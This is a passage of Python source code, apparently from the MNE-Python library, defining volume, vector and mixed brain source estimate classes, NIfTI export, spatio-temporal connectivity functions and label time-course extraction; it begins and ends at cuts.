super().__init__(data, vertices, tmin, tstep, subject, verbose)\n if self._data is not None and self._data.shape[1] != 3:\n raise ValueError('Data for VectorSourceEstimate must have second '\n 'dimension of length 3, got length %s'\n % (self._data.shape[1],))\n\n def magnitude(self):\n \"\"\"Compute magnitude of activity without directionality.\n\n Returns\n -------\n stc : instance of SourceEstimate\n The source estimate without directionality information.\n \"\"\"\n data_mag = np.linalg.norm(self.data, axis=1)\n return self._scalar_class(\n data_mag, self.vertices, self.tmin, self.tstep, self.subject,\n self.verbose)\n\n @fill_doc\n def normal(self, src, use_cps=True):\n \"\"\"Compute activity orthogonal to the cortex.\n\n Parameters\n ----------\n src : instance of SourceSpaces\n The source space for which this source estimate is specified.\n %(use_cps)s\n Should be the same value that was used when the forward model\n was computed (typically True).\n\n .. versionadded:: 0.20\n\n Returns\n -------\n stc : instance of SourceEstimate\n The source estimate only retaining the activity orthogonal to the\n cortex.\n \"\"\"\n _check_src_normal('normal', src)\n normals = np.vstack([_get_src_nn(s, use_cps, v) for s, v in\n zip(src, self._vertices_list)])\n data_norm = einsum('ijk,ij->ik', self.data, normals)\n return self._scalar_class(\n data_norm, self.vertices, self.tmin, self.tstep, self.subject,\n self.verbose)\n\n\nclass _BaseVolSourceEstimate(_BaseSourceEstimate):\n\n _data_ndim = 2\n _src_type = 'volume'\n\n @verbose\n def __init__(self, data, vertices=None, tmin=None, tstep=None,\n subject=None, verbose=None): # noqa: D102\n _validate_type(vertices, (np.ndarray, list), 'vertices')\n _BaseSourceEstimate.__init__(self, data, vertices=vertices, tmin=tmin,\n tstep=tstep, subject=subject,\n verbose=verbose)\n\n @property\n def _vertices_list(self):\n return [self.vertices]\n\n @copy_function_doc_to_method_doc(plot_volume_source_estimates)\n def plot(self, src, subject=None, subjects_dir=None, mode='stat_map',\n bg_img=None, colorbar=True, colormap='auto', clim='auto',\n transparent='auto', show=True, initial_time=None,\n initial_pos=None, verbose=None):\n data = self.magnitude() if self._data_ndim == 3 else self\n return plot_volume_source_estimates(\n data, src=src, subject=subject, subjects_dir=subjects_dir,\n mode=mode, bg_img=bg_img, colorbar=colorbar, colormap=colormap,\n clim=clim, transparent=transparent, show=show,\n initial_time=initial_time, initial_pos=initial_pos,\n verbose=verbose)\n\n def save_as_volume(self, fname, src, dest='mri', mri_resolution=False,\n format='nifti1'):\n \"\"\"Save a volume source estimate in a NIfTI file.\n\n Parameters\n ----------\n fname : str\n The name of the generated nifti file.\n src : list\n The list of source spaces (should all be of type volume).\n dest : 'mri' | 'surf'\n If 'mri' the volume is defined in the coordinate system of\n the original T1 image. If 'surf' the coordinate system\n of the FreeSurfer surface is used (Surface RAS).\n mri_resolution : bool\n It True the image is saved in MRI resolution.\n\n .. warning:: If you have many time points, the file produced can be\n huge.\n format : str\n Either 'nifti1' (default) or 'nifti2'.\n\n .. versionadded:: 0.17\n\n Returns\n -------\n img : instance Nifti1Image\n The image object.\n\n Notes\n -----\n .. versionadded:: 0.9.0\n \"\"\"\n import nibabel as nib\n _validate_type(fname, 'path-like', 'fname')\n fname = str(fname)\n img = self.as_volume(src, dest=dest, mri_resolution=mri_resolution,\n format=format)\n nib.save(img, fname)\n\n def as_volume(self, src, dest='mri', mri_resolution=False,\n format='nifti1'):\n \"\"\"Export volume source estimate as a nifti object.\n\n Parameters\n ----------\n src : list\n The list of source spaces (should all be of type volume).\n dest : 'mri' | 'surf'\n If 'mri' the volume is defined in the coordinate system of\n the original T1 image. If 'surf' the coordinate system\n of the FreeSurfer surface is used (Surface RAS).\n mri_resolution : bool\n It True the image is saved in MRI resolution.\n\n .. warning:: If you have many time points, the file produced can be\n huge.\n format : str\n Either 'nifti1' (default) or 'nifti2'.\n\n Returns\n -------\n img : instance of Nifti1Image\n The image object.\n\n Notes\n -----\n .. versionadded:: 0.9.0\n \"\"\"\n from .morph import _interpolate_data\n data = self.magnitude() if self._data_ndim == 3 else self\n return _interpolate_data(data, src, mri_resolution=mri_resolution,\n mri_space=True, output=format)\n\n def get_peak(self, tmin=None, tmax=None, mode='abs',\n vert_as_index=False, time_as_index=False):\n \"\"\"Get location and latency of peak amplitude.\n\n Parameters\n ----------\n tmin : float | None\n The minimum point in time to be considered for peak getting.\n tmax : float | None\n The maximum point in time to be considered for peak getting.\n mode : {'pos', 'neg', 'abs'}\n How to deal with the sign of the data. If 'pos' only positive\n values will be considered. If 'neg' only negative values will\n be considered. If 'abs' absolute values will be considered.\n Defaults to 'abs'.\n vert_as_index : bool\n Whether to return the vertex index instead of of its ID.\n Defaults to False.\n time_as_index : bool\n Whether to return the time index instead of the latency.\n Defaults to False.\n\n Returns\n -------\n pos : int\n The vertex exhibiting the maximum response, either ID or index.\n latency : float\n The latency in seconds.\n \"\"\"\n stc = self.magnitude() if self._data_ndim == 3 else self\n vert_idx, time_idx, _ = _get_peak(stc.data, self.times, tmin, tmax,\n mode)\n\n return (vert_idx if vert_as_index else self.vertices[vert_idx],\n time_idx if time_as_index else self.times[time_idx])\n\n\n@fill_doc\nclass VolSourceEstimate(_BaseVolSourceEstimate):\n \"\"\"Container for volume source estimates.\n\n Parameters\n ----------\n data : array of shape (n_dipoles, n_times) | tuple, shape (2,)\n The data in source space. The data can either be a single array or\n a tuple with two arrays: \"kernel\" shape (n_vertices, n_sensors) and\n \"sens_data\" shape (n_sensors, n_times). In this case, the source\n space data corresponds to ``np.dot(kernel, sens_data)``.\n vertices : array of shape (n_dipoles,)\n The indices of the dipoles in the source space.\n tmin : scalar\n Time point of the first sample in data.\n tstep : scalar\n Time step between successive samples in data.\n subject : str | None\n The subject name. While not necessary, it is safer to set the\n subject parameter to avoid analysis errors.\n %(verbose)s\n\n Attributes\n ----------\n subject : str | None\n The subject name.\n times : array of shape (n_times,)\n The time vector.\n vertices : array of shape (n_dipoles,)\n The indices of the dipoles in the source space.\n data : array of shape (n_dipoles, n_times)\n The data in source space.\n shape : tuple\n The shape of the data. A tuple of int (n_dipoles, n_times).\n\n See Also\n --------\n SourceEstimate : A container for surface source estimates.\n VolVectorSourceEstimate : A container for volume vector source estimates.\n MixedSourceEstimate : A container for mixed surface + volume source\n estimates.\n\n Notes\n -----\n .. versionadded:: 0.9.0\n \"\"\"\n\n @verbose\n def save(self, fname, ftype='stc', verbose=None):\n \"\"\"Save the source estimates to a file.\n\n Parameters\n ----------\n fname : str\n The stem of the file name. The stem is extended with \"-vl.stc\"\n or \"-vl.w\".\n ftype : str\n File format to use. Allowed values are \"stc\" (default), \"w\",\n and \"h5\". The \"w\" format only supports a single time point.\n %(verbose_meth)s\n \"\"\"\n _validate_type(fname, 'path-like', 'fname')\n fname = str(fname)\n _check_option('ftype', ftype, ['stc', 'w', 'h5'])\n if ftype == 'stc':\n logger.info('Writing STC to disk...')\n if not (fname.endswith('-vl.stc') or fname.endswith('-vol.stc')):\n fname += '-vl.stc'\n _write_stc(fname, tmin=self.tmin, tstep=self.tstep,\n vertices=self.vertices, data=self.data)\n elif ftype == 'w':\n logger.info('Writing STC to disk (w format)...')\n if not (fname.endswith('-vl.w') or fname.endswith('-vol.w')):\n fname += '-vl.w'\n _write_w(fname, vertices=self.vertices, data=self.data)\n elif ftype == 'h5':\n super().save(fname, 'h5')\n logger.info('[done]')\n\n\n@fill_doc\nclass VolVectorSourceEstimate(_BaseVectorSourceEstimate,\n _BaseVolSourceEstimate):\n \"\"\"Container for volume source estimates.\n\n Parameters\n ----------\n data : array of shape (n_dipoles, 3, n_times)\n The data in source space. Each dipole contains three vectors that\n denote the dipole strength in X, Y and Z directions over time.\n vertices : array of shape (n_dipoles,)\n The indices of the dipoles in the source space.\n tmin : scalar\n Time point of the first sample in data.\n tstep : scalar\n Time step between successive samples in data.\n subject : str | None\n The subject name. While not necessary, it is safer to set the\n subject parameter to avoid analysis errors.\n %(verbose)s\n\n Attributes\n ----------\n subject : str | None\n The subject name.\n times : array of shape (n_times,)\n The time vector.\n vertices : array of shape (n_dipoles,)\n The indices of the dipoles in the source space.\n data : array of shape (n_dipoles, n_times)\n The data in source space.\n shape : tuple\n The shape of the data. A tuple of int (n_dipoles, n_times).\n\n See Also\n --------\n SourceEstimate : A container for surface source estimates.\n VectorSourceEstimate : A container for vector source estimates.\n MixedSourceEstimate : A container for mixed surface + volume source\n estimates.\n\n Notes\n -----\n .. versionadded:: 0.9.0\n \"\"\"\n\n _data_ndim = 3\n _scalar_class = VolSourceEstimate\n\n\n@fill_doc\nclass VectorSourceEstimate(_BaseVectorSourceEstimate,\n _BaseSurfaceSourceEstimate):\n \"\"\"Container for vector surface source estimates.\n\n For each vertex, the magnitude of the current is defined in the X, Y and Z\n directions.\n\n Parameters\n ----------\n data : array of shape (n_dipoles, 3, n_times)\n The data in source space. Each dipole contains three vectors that\n denote the dipole strength in X, Y and Z directions over time.\n vertices : list of array, shape (2,)\n Vertex numbers corresponding to the data. The first element of the list\n contains vertices of left hemisphere and the second element contains\n vertices of right hemisphere.\n tmin : float\n Time point of the first sample in data.\n tstep : float\n Time step between successive samples in data.\n subject : str | None\n The subject name. While not necessary, it is safer to set the\n subject parameter to avoid analysis errors.\n %(verbose)s\n\n Attributes\n ----------\n subject : str | None\n The subject name.\n times : array of shape (n_times,)\n The time vector.\n shape : tuple\n The shape of the data. A tuple of int (n_dipoles, n_times).\n\n See Also\n --------\n SourceEstimate : A container for surface source estimates.\n VolSourceEstimate : A container for volume source estimates.\n MixedSourceEstimate : A container for mixed surface + volume source\n estimates.\n\n Notes\n -----\n .. versionadded:: 0.15\n \"\"\"\n\n _data_ndim = 3\n _scalar_class = SourceEstimate\n\n @copy_function_doc_to_method_doc(plot_vector_source_estimates)\n def plot(self, subject=None, hemi='lh', colormap='hot', time_label='auto',\n smoothing_steps=10, transparent=True, brain_alpha=0.4,\n overlay_alpha=None, vector_alpha=1.0, scale_factor=None,\n time_viewer='auto', subjects_dir=None, figure=None, views='lat',\n colorbar=True, clim='auto', cortex='classic', size=800,\n background='black', foreground='white', initial_time=None,\n time_unit='s', show_traces='auto', verbose=None): # noqa: D102\n\n return plot_vector_source_estimates(\n self, subject=subject, hemi=hemi, colormap=colormap,\n time_label=time_label, smoothing_steps=smoothing_steps,\n transparent=transparent, brain_alpha=brain_alpha,\n overlay_alpha=overlay_alpha, vector_alpha=vector_alpha,\n scale_factor=scale_factor, time_viewer=time_viewer,\n subjects_dir=subjects_dir, figure=figure, views=views,\n colorbar=colorbar, clim=clim, cortex=cortex, size=size,\n background=background, foreground=foreground,\n initial_time=initial_time, time_unit=time_unit,\n show_traces=show_traces, verbose=verbose,\n )\n\n\n@fill_doc\nclass MixedSourceEstimate(_BaseSourceEstimate):\n \"\"\"Container for mixed surface and volume source estimates.\n\n Parameters\n ----------\n data : array of shape (n_dipoles, n_times) | tuple, shape (2,)\n The data in source space. The data can either be a single array or\n a tuple with two arrays: \"kernel\" shape (n_vertices, n_sensors) and\n \"sens_data\" shape (n_sensors, n_times). In this case, the source\n space data corresponds to ``np.dot(kernel, sens_data)``.\n vertices : list of array\n Vertex numbers corresponding to the data. The list contains arrays\n with one array per source space.\n tmin : scalar\n Time point of the first sample in data.\n tstep : scalar\n Time step between successive samples in data.\n subject : str | None\n The subject name. While not necessary, it is safer to set the\n subject parameter to avoid analysis errors.\n %(verbose)s\n\n Attributes\n ----------\n subject : str | None\n The subject name.\n times : array of shape (n_times,)\n The time vector.\n vertices : list of array\n Vertex numbers corresponding to the data. The list contains arrays\n with one array per source space.\n data : array of shape (n_dipoles, n_times)\n The data in source space.\n shape : tuple\n The shape of the data. A tuple of int (n_dipoles, n_times).\n\n See Also\n --------\n SourceEstimate : A container for surface source estimates.\n VectorSourceEstimate : A container for vector source estimates.\n VolSourceEstimate : A container for volume source estimates.\n VolVectorSourceEstimate : A container for Volume vector source estimates.\n\n Notes\n -----\n .. versionadded:: 0.9.0\n \"\"\"\n\n _data_ndim = 2\n _src_type = 'mixed'\n\n @verbose\n def __init__(self, data, vertices=None, tmin=None, tstep=None,\n subject=None, verbose=None): # noqa: D102\n if not isinstance(vertices, list) or len(vertices) < 2:\n raise ValueError('Vertices must be a list of numpy arrays with '\n 'one array per source space.')\n\n _BaseSourceEstimate.__init__(self, data, vertices=vertices, tmin=tmin,\n tstep=tstep, subject=subject,\n verbose=verbose)\n\n @fill_doc\n def plot_surface(self, src, subject=None, surface='inflated', hemi='lh',\n colormap='auto', time_label='time=%02.f ms',\n smoothing_steps=10,\n transparent=None, alpha=1.0, time_viewer='auto',\n subjects_dir=None, figure=None,\n views='lat', colorbar=True, clim='auto'):\n \"\"\"Plot surface source estimates with PySurfer.\n\n Note: PySurfer currently needs the SUBJECTS_DIR environment variable,\n which will automatically be set by this function. Plotting multiple\n SourceEstimates with different values for subjects_dir will cause\n PySurfer to use the wrong FreeSurfer surfaces when using methods of\n the returned Brain object. It is therefore recommended to set the\n SUBJECTS_DIR environment variable or always use the same value for\n subjects_dir (within the same Python session).\n\n Parameters\n ----------\n src : SourceSpaces\n The source spaces to plot.\n subject : str | None\n The subject name corresponding to FreeSurfer environment\n variable SUBJECT. If None stc.subject will be used. If that\n is None, the environment will be used.\n surface : str\n The type of surface (inflated, white etc.).\n hemi : str, 'lh' | 'rh' | 'split' | 'both'\n The hemisphere to display. Using 'both' or 'split' requires\n PySurfer version 0.4 or above.\n colormap : str | np.ndarray of float, shape(n_colors, 3 | 4)\n Name of colormap to use. See `plot_source_estimates`.\n time_label : str\n How to print info about the time instant visualized.\n smoothing_steps : int\n The amount of smoothing.\n transparent : bool | None\n If True, use a linear transparency between fmin and fmid.\n None will choose automatically based on colormap type.\n alpha : float\n Alpha value to apply globally to the overlay.\n time_viewer : bool\n Display time viewer GUI.\n %(subjects_dir)s\n figure : instance of mayavi.mlab.Figure | None\n If None, the last figure will be cleaned and a new figure will\n be created.\n views : str | list\n View to use. See `surfer.Brain`.\n colorbar : bool\n If True, display colorbar on scene.\n clim : str | dict\n Colorbar properties specification. See `plot_source_estimates`.\n\n Returns\n -------\n brain : instance of surfer.Brain\n A instance of `surfer.Brain` from PySurfer.\n \"\"\"\n # extract surface source spaces\n surf = _ensure_src(src, kind='surface')\n\n # extract surface source estimate\n data = self.data[:surf[0]['nuse'] + surf[1]['nuse']]\n vertices = [s['vertno'] for s in surf]\n\n stc = SourceEstimate(data, vertices, self.tmin, self.tstep,\n self.subject, self.verbose)\n\n return plot_source_estimates(stc, subject, surface=surface, hemi=hemi,\n colormap=colormap, time_label=time_label,\n smoothing_steps=smoothing_steps,\n transparent=transparent, alpha=alpha,\n time_viewer=time_viewer,\n subjects_dir=subjects_dir, figure=figure,\n views=views, colorbar=colorbar, clim=clim)\n\n\n###############################################################################\n# Morphing\n\n\ndef _get_vol_mask(src):\n \"\"\"Get the volume source space mask.\"\"\"\n assert len(src) == 1 # not a mixed source space\n shape = src[0]['shape'][::-1]\n mask = np.zeros(shape, bool)\n mask.flat[src[0]['vertno']] = True\n return mask\n\n\ndef _spatio_temporal_src_connectivity_vol(src, n_times):\n from sklearn.feature_extraction import grid_to_graph\n mask = _get_vol_mask(src)\n edges = grid_to_graph(*mask.shape, mask=mask)\n connectivity = _get_connectivity_from_edges(edges, n_times)\n return connectivity\n\n\ndef _spatio_temporal_src_connectivity_surf(src, n_times):\n if src[0]['use_tris'] is None:\n # XXX It would be nice to support non oct source spaces too...\n raise RuntimeError(\"The source space does not appear to be an ico \"\n \"surface. Connectivity cannot be extracted from\"\n \" non-ico source spaces.\")\n used_verts = [np.unique(s['use_tris']) for s in src]\n offs = np.cumsum([0] + [len(u_v) for u_v in used_verts])[:-1]\n tris = np.concatenate([np.searchsorted(u_v, s['use_tris']) + off\n for u_v, s, off in zip(used_verts, src, offs)])\n connectivity = spatio_temporal_tris_connectivity(tris, n_times)\n\n # deal with source space only using a subset of vertices\n masks = [np.in1d(u, s['vertno']) for s, u in zip(src, used_verts)]\n if sum(u.size for u in used_verts) != connectivity.shape[0] / n_times:\n raise ValueError('Used vertices do not match connectivity shape')\n if [np.sum(m) for m in masks] != [len(s['vertno']) for s in src]:\n raise ValueError('Vertex mask does not match number of vertices')\n masks = np.concatenate(masks)\n missing = 100 * float(len(masks) - np.sum(masks)) / len(masks)\n if missing:\n warn_('%0.1f%% of original source space vertices have been'\n ' omitted, tri-based connectivity will have holes.\\n'\n 'Consider using distance-based connectivity or '\n 'morphing data to all source space vertices.' % missing)\n masks = np.tile(masks, n_times)\n masks = np.where(masks)[0]\n connectivity = connectivity.tocsr()\n connectivity = connectivity[masks]\n connectivity = connectivity[:, masks]\n # return to original format\n connectivity = connectivity.tocoo()\n return connectivity\n\n\n@verbose\ndef spatio_temporal_src_connectivity(src, n_times, dist=None, verbose=None):\n \"\"\"Compute connectivity for a source space activation over time.\n\n Parameters\n ----------\n src : instance of SourceSpaces\n The source space. It can be a surface source space or a\n volume source space.\n n_times : int\n Number of time instants.\n dist : float, or None\n Maximal geodesic distance (in m) between vertices in the\n source space to consider neighbors. If None, immediate neighbors\n are extracted from an ico surface.\n %(verbose)s\n\n Returns\n -------\n connectivity : ~scipy.sparse.coo_matrix\n The connectivity matrix describing the spatio-temporal\n graph structure. If N is the number of vertices in the\n source space, the N first nodes in the graph are the\n vertices are time 1, the nodes from 2 to 2N are the vertices\n during time 2, etc.\n \"\"\"\n # XXX we should compute connectivity for each source space and then\n # use scipy.sparse.block_diag to concatenate them\n if src[0]['type'] == 'vol':\n if dist is not None:\n raise ValueError('dist must be None for a volume '\n 'source space. Got %s.' % dist)\n\n connectivity = _spatio_temporal_src_connectivity_vol(src, n_times)\n elif dist is not None:\n # use distances computed and saved in the source space file\n connectivity = spatio_temporal_dist_connectivity(src, n_times, dist)\n else:\n connectivity = _spatio_temporal_src_connectivity_surf(src, n_times)\n return connectivity\n\n\n@verbose\ndef grade_to_tris(grade, verbose=None):\n \"\"\"Get tris defined for a certain grade.\n\n Parameters\n ----------\n grade : int\n Grade of an icosahedral mesh.\n %(verbose)s\n\n Returns\n -------\n tris : list\n 2-element list containing Nx3 arrays of tris, suitable for use in\n spatio_temporal_tris_connectivity.\n \"\"\"\n a = _get_ico_tris(grade, None, False)\n tris = np.concatenate((a, a + (np.max(a) + 1)))\n return tris\n\n\n@verbose\ndef spatio_temporal_tris_connectivity(tris, n_times, remap_vertices=False,\n verbose=None):\n \"\"\"Compute connectivity from triangles and time instants.\n\n Parameters\n ----------\n tris : array\n N x 3 array defining triangles.\n n_times : int\n Number of time points.\n remap_vertices : bool\n Reassign vertex indices based on unique values. Useful\n to process a subset of triangles. Defaults to False.\n %(verbose)s\n\n Returns\n -------\n connectivity : ~scipy.sparse.coo_matrix\n The connectivity matrix describing the spatio-temporal\n graph structure. If N is the number of vertices in the\n source space, the N first nodes in the graph are the\n vertices are time 1, the nodes from 2 to 2N are the vertices\n during time 2, etc.\n \"\"\"\n if remap_vertices:\n logger.info('Reassigning vertex indices.')\n tris = np.searchsorted(np.unique(tris), tris)\n\n edges = mesh_edges(tris).tocoo()\n return _get_connectivity_from_edges(edges, n_times)\n\n\n@verbose\ndef spatio_temporal_dist_connectivity(src, n_times, dist, verbose=None):\n \"\"\"Compute connectivity from distances in a source space and time instants.\n\n Parameters\n ----------\n src : instance of SourceSpaces\n The source space must have distances between vertices computed, such\n that src['dist'] exists and is useful. This can be obtained\n with a call to :func:`mne.setup_source_space` with the\n ``add_dist=True`` option.\n n_times : int\n Number of time points.\n dist : float\n Maximal geodesic distance (in m) between vertices in the\n source space to consider neighbors.\n %(verbose)s\n\n Returns\n -------\n connectivity : ~scipy.sparse.coo_matrix\n The connectivity matrix describing the spatio-temporal\n graph structure. If N is the number of vertices in the\n source space, the N first nodes in the graph are the\n vertices are time 1, the nodes from 2 to 2N are the vertices\n during time 2, etc.\n \"\"\"\n if src[0]['dist'] is None:\n raise RuntimeError('src must have distances included, consider using '\n 'setup_source_space with add_dist=True')\n edges = sparse_block_diag([s['dist'][s['vertno'], :][:, s['vertno']]\n for s in src])\n edges.data[:] = np.less_equal(edges.data, dist)\n # clean it up and put it in coo format\n edges = edges.tocsr()\n edges.eliminate_zeros()\n edges = edges.tocoo()\n return _get_connectivity_from_edges(edges, n_times)\n\n\n@verbose\ndef spatial_src_connectivity(src, dist=None, verbose=None):\n \"\"\"Compute connectivity for a source space activation.\n\n Parameters\n ----------\n src : instance of SourceSpaces\n The source space. It can be a surface source space or a\n volume source space.\n dist : float, or None\n Maximal geodesic distance (in m) between vertices in the\n source space to consider neighbors. If None, immediate neighbors\n are extracted from an ico surface.\n %(verbose)s\n\n Returns\n -------\n connectivity : ~scipy.sparse.coo_matrix\n The connectivity matrix describing the spatial graph structure.\n \"\"\"\n return spatio_temporal_src_connectivity(src, 1, dist)\n\n\n@verbose\ndef spatial_tris_connectivity(tris, remap_vertices=False, verbose=None):\n \"\"\"Compute connectivity from triangles.\n\n Parameters\n ----------\n tris : array\n N x 3 array defining triangles.\n remap_vertices : bool\n Reassign vertex indices based on unique values. Useful\n to process a subset of triangles. Defaults to False.\n %(verbose)s\n\n Returns\n -------\n connectivity : ~scipy.sparse.coo_matrix\n The connectivity matrix describing the spatial graph structure.\n \"\"\"\n return spatio_temporal_tris_connectivity(tris, 1, remap_vertices)\n\n\n@verbose\ndef spatial_dist_connectivity(src, dist, verbose=None):\n \"\"\"Compute connectivity from distances in a source space.\n\n Parameters\n ----------\n src : instance of SourceSpaces\n The source space must have distances between vertices computed, such\n that src['dist'] exists and is useful. This can be obtained\n with a call to :func:`mne.setup_source_space` with the\n ``add_dist=True`` option.\n dist : float\n Maximal geodesic distance (in m) between vertices in the\n source space to consider neighbors.\n %(verbose)s\n\n Returns\n -------\n connectivity : ~scipy.sparse.coo_matrix\n The connectivity matrix describing the spatial graph structure.\n \"\"\"\n return spatio_temporal_dist_connectivity(src, 1, dist)\n\n\n@verbose\ndef spatial_inter_hemi_connectivity(src, dist, verbose=None):\n \"\"\"Get vertices on each hemisphere that are close to the other hemisphere.\n\n Parameters\n ----------\n src : instance of SourceSpaces\n The source space. Must be surface type.\n dist : float\n Maximal Euclidean distance (in m) between vertices in one hemisphere\n compared to the other to consider neighbors.\n %(verbose)s\n\n Returns\n -------\n connectivity : ~scipy.sparse.coo_matrix\n The connectivity matrix describing the spatial graph structure.\n Typically this should be combined (addititively) with another\n existing intra-hemispheric connectivity matrix, e.g. computed\n using geodesic distances.\n \"\"\"\n from scipy.spatial.distance import cdist\n src = _ensure_src(src, kind='surface')\n conn = cdist(src[0]['rr'][src[0]['vertno']],\n src[1]['rr'][src[1]['vertno']])\n conn = sparse.csr_matrix(conn <= dist, dtype=int)\n empties = [sparse.csr_matrix((nv, nv), dtype=int) for nv in conn.shape]\n conn = sparse.vstack([sparse.hstack([empties[0], conn]),\n sparse.hstack([conn.T, empties[1]])])\n return conn\n\n\n@verbose\ndef _get_connectivity_from_edges(edges, n_times, verbose=None):\n \"\"\"Given edges sparse matrix, create connectivity matrix.\"\"\"\n n_vertices = edges.shape[0]\n logger.info(\"-- number of connected vertices : %d\" % n_vertices)\n nnz = edges.col.size\n aux = n_vertices * np.arange(n_times)[:, None] * np.ones((1, nnz), np.int)\n col = (edges.col[None, :] + aux).ravel()\n row = (edges.row[None, :] + aux).ravel()\n if n_times > 1: # add temporal edges\n o = (n_vertices * np.arange(n_times - 1)[:, None] +\n np.arange(n_vertices)[None, :]).ravel()\n d = (n_vertices * np.arange(1, n_times)[:, None] +\n np.arange(n_vertices)[None, :]).ravel()\n row = np.concatenate((row, o, d))\n col = np.concatenate((col, d, o))\n data = np.ones(edges.data.size * n_times + 2 * n_vertices * (n_times - 1),\n dtype=np.int)\n connectivity = coo_matrix((data, (row, col)),\n shape=(n_times * n_vertices,) * 2)\n return connectivity\n\n\n@verbose\ndef _get_ico_tris(grade, verbose=None, return_surf=False):\n \"\"\"Get triangles for ico surface.\"\"\"\n ico = _get_ico_surface(grade)\n if not return_surf:\n return ico['tris']\n else:\n return ico\n\n\ndef _pca_flip(flip, data):\n U, s, V = linalg.svd(data, full_matrices=False)\n # determine sign-flip\n sign = np.sign(np.dot(U[:, 0], flip))\n # use average power in label for scaling\n scale = linalg.norm(s) / np.sqrt(len(data))\n return sign * scale * V[0]\n\n\n_label_funcs = {\n 'mean': lambda flip, data: np.mean(data, axis=0),\n 'mean_flip': lambda flip, data: np.mean(flip * data, axis=0),\n 'max': lambda flip, data: np.max(np.abs(data), axis=0),\n 'pca_flip': _pca_flip,\n}\n\n\n@contextlib.contextmanager\ndef _temporary_vertices(src, vertices):\n orig_vertices = [s['vertno'] for s in src]\n for s, v in zip(src, vertices):\n s['vertno'] = v\n try:\n yield\n finally:\n for s, v in zip(src, orig_vertices):\n s['vertno'] = v\n\n\ndef _prepare_label_extraction(stc, labels, src, mode, allow_empty):\n \"\"\"Prepare indices and flips for extract_label_time_course.\"\"\"\n # if src is a mixed src space, the first 2 src spaces are surf type and\n # the other ones are vol type. For mixed source space n_labels will be the\n # given by the number of ROIs of the cortical parcellation plus the number\n # of vol src space\n from .label import label_sign_flip\n\n # get vertices from source space, they have to be the same as in the stcs\n vertno = stc.vertices\n nvert = [len(vn) for vn in vertno]\n\n # do the initialization\n label_vertidx = list()\n label_flip = list()\n for s, v, hemi in zip(src, stc.vertices, ('left', 'right')):\n n_missing = (~np.in1d(v, s['vertno'])).sum()\n if n_missing:\n raise ValueError('%d/%d %s hemisphere stc vertices missing from '\n 'the source space, likely mismatch'\n % (n_missing, len(v), hemi))\n for label in labels:\n if label.hemi == 'both':\n # handle BiHemiLabel\n sub_labels = [label.lh, label.rh]\n else:\n sub_labels = [label]\n this_vertidx = list()\n for slabel in sub_labels:\n if slabel.hemi == 'lh':\n this_vertices = np.intersect1d(vertno[0], slabel.vertices)\n vertidx = np.searchsorted(vertno[0], this_vertices)\n elif slabel.hemi == 'rh':\n this_vertices = np.intersect1d(vertno[1], slabel.vertices)\n vertidx = nvert[0] + np.searchsorted(vertno[1], this_vertices)\n else:\n raise ValueError('label %s has invalid hemi' % label.name)\n this_vertidx.append(vertidx)\n\n # convert it to an array\n this_vertidx = np.concatenate(this_vertidx)\n this_flip = None\n if len(this_vertidx) == 0:\n msg = ('source space does not contain any vertices for label %s'\n % label.name)\n if not allow_empty:\n raise ValueError(msg)\n else:\n warn_(msg + '. Assigning all-zero time series to label.')\n this_vertidx = None # to later check if label is empty\n elif mode not in ('mean', 'max'): # mode-dependent initialization\n # label_sign_flip uses two properties:\n #\n # - src[ii]['nn']\n # - src[ii]['vertno']\n #\n # So if we override vertno with the stc vertices, it will pick\n # the correct normals.\n with _temporary_vertices(src, stc.vertices):\n this_flip = label_sign_flip(label, src[:2])[:, None]\n\n label_vertidx.append(this_vertidx)\n label_flip.append(this_flip)\n\n return label_vertidx, label_flip\n\n\ndef _gen_extract_label_time_course(stcs, labels, src, mode='mean',\n allow_empty=False, verbose=None):\n # loop through source estimates and extract time series\n _check_option('mode', mode, sorted(_label_funcs.keys()))\n func = _label_funcs[mode]\n if len(src) > 2:\n if src[0]['type'] != 'surf' or src[1]['type'] != 'surf':\n raise ValueError('The first 2 source spaces have to be surf type')\n if any(np.any(s['type'] != 'vol') for s in src[2:]):\n raise ValueError('source spaces have to be of vol type')\n\n n_aparc = len(labels)\n n_aseg = len(src[2:])\n n_labels = n_aparc + n_aseg\n else:\n n_labels = len(labels)\n vertno = None\n for stc in stcs:\n if vertno is None:\n vertno = copy.deepcopy(stc.vertices)\n nvert = [len(v) for v in vertno]\n label_vertidx, src_flip = _prepare_label_extraction(\n stc, labels, src, mode, allow_empty)\n # make sure the stc is compatible with the source space\n for i in range(len(vertno)):\n if len(stc.vertices[i]) != nvert[i]:\n raise ValueError('stc not compatible with source space. '\n 'stc has %s time series but there are %s '\n 'vertices in source space'\n % (len(stc.vertices[i]), nvert[i]))\n\n if any(np.any(svn != vn) for svn, vn in zip(stc.vertices, vertno)):\n raise ValueError('stc not compatible with source space')\n if sum(nvert) != stc.shape[0]:\n raise ValueError('stc not compatible with source space. '\n 'stc has %s vertices but the source space '\n 'has %s vertices'\n % (stc.shape[0], sum(nvert)))\n\n logger.info('Extracting time courses for %d labels (mode: %s)'\n % (n_labels, mode))\n\n # do the extraction\n label_tc = np.zeros((n_labels, stc.data.shape[1]),\n dtype=stc.data.dtype)\n for i, (vertidx, flip) in enumerate(zip(label_vertidx, src_flip)):\n if vertidx is not None:\n label_tc[i] = func(flip, stc.data[vertidx, :])\n\n # extract label time series for the vol src space\n if len(src) > 2:\n v1 = nvert[0] + nvert[1]\n for i, nv in enumerate(nvert[2:]):\n\n v2 = v1 + nv\n v = range(v1, v2)\n if nv != 0:\n label_tc[n_aparc + i] = np.mean(stc.data[v, :], axis=0)\n\n v1 = v2\n\n # this is a generator!\n yield label_tc\n\n\n@verbose\ndef extract_label_time_course(stcs, labels, src, mode='mean_flip',\n allow_empty=False, return_generator=False,\n verbose=None):\n \"\"\"Extract label time course for lists of labels and source estimates.\n\n This function will extract one time course for each label and source\n estimate. The way the time courses are extracted depends on the mode\n parameter (see Notes).\n\n Parameters\n ----------\n stcs : SourceEstimate | list (or generator) of SourceEstimate\n The source estimates from which to extract the time course.\n %(eltc_labels)s\n %(eltc_src)s\n %(eltc_mode)s\n %(eltc_allow_empty)s\n return_generator : bool\n If True, a generator instead of a list is returned.\n %(verbose)s\n\n Returns\n -------\n label_tc : array | list (or generator) of array, shape (n_labels, n_times)\n Extracted time course for each label and source estimate.\n\n Notes\n -----\n %(eltc_mode_notes)s\n\n If encountering a ``ValueError`` due to mismatch between number of\n source points in the subject source space and computed ``stc`` object set\n ``src`` argument to ``fwd['src']`` to ensure the source space is\n compatible between forward and inverse routines.\n \"\"\"\n # convert inputs to lists\n if isinstance(stcs, SourceEstimate):\n stcs = [stcs]\n return_several = False\n return_generator = 